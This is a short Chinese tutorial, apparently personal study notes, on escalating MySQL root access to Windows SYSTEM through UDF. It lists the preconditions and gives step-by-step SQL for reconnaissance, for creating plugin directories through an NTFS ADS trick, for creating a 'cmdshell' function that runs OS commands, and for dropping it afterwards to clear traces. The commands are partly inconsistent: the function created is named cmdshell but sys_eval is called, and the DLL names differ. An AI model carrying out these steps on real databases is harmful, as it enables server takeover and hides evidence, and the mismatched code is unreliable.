Day2——提权学习之MySQL数据库（UDF提权）

0x00 原理

UDF(user-defined function)是MySQL的一个拓展接口，也可称之为用户自定义函数，它是用来拓展MySQL的技术手段，可以说是数据库功能的一种扩展。
通过在udf文件中定义新函数，对MYSQL的功能进行扩充，可以执行系统任意命令，将MYSQL账号root转化为系统system权限。

0x01 利用条件

1. mysql版本大于5.1，udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下

2. mysql版本小于5.1， udf.dll文件在windows server 2003下放置于c:\windows\system32目录，在windows server 2000下放置在c:\winnt\system32目录。

3. 掌握mysql数据库的账户，从拥有对mysql的insert和delete权限，以创建和抛弃函数。拥有可以将udf.dll写入相应目录的权限。

4. 可以将udf.dll写入到相应目录的权限。

0x02 提权关键

导出UDF文件到指定路径

0x03 提权步骤

1、获取数据库版本、数据位置以及插件位置等信息

select version();//获取数据库版本 
select user();//获取数据库用户 
select @@basedir ;//获取安装目录 
show variables like '%plugins%'; //寻找mysql安装路径 

2、导出UDF文件
关于UDF文件：
sqlmap中有现成的udf文件，分为32位和64位，一定要选择对版本
关于路径：

MySQL<5.0，导出路径随意；
5.0 <= MySQL<5.1，则需要导出至目标服务器的系统目录（如：c:/windows/system32/）
MySQL 5.1以上版本，必须要把udf.dll文件放到MySQL安装目录下的lib\plugin文件夹下才能创建自定义函数。

用NTFS ADS流模式突破进而创建文件夹

select @@basedir;  //查找到mysql的目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';    //利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';    //利用NTFS ADS创建plugin目录

3、创建cmdshell 函数

create function cmdshell returns string soname ‘lib_mysqludf_sys.dll’; 

4、执行自定义函数

select sys_eval(‘whoami’); 

5、清除痕迹

drop function cmdshell

0x04 参考

https://www.cnblogs.com/R4v3n/articles/8722657.html
《网络攻防实战研究——漏洞利用与提权》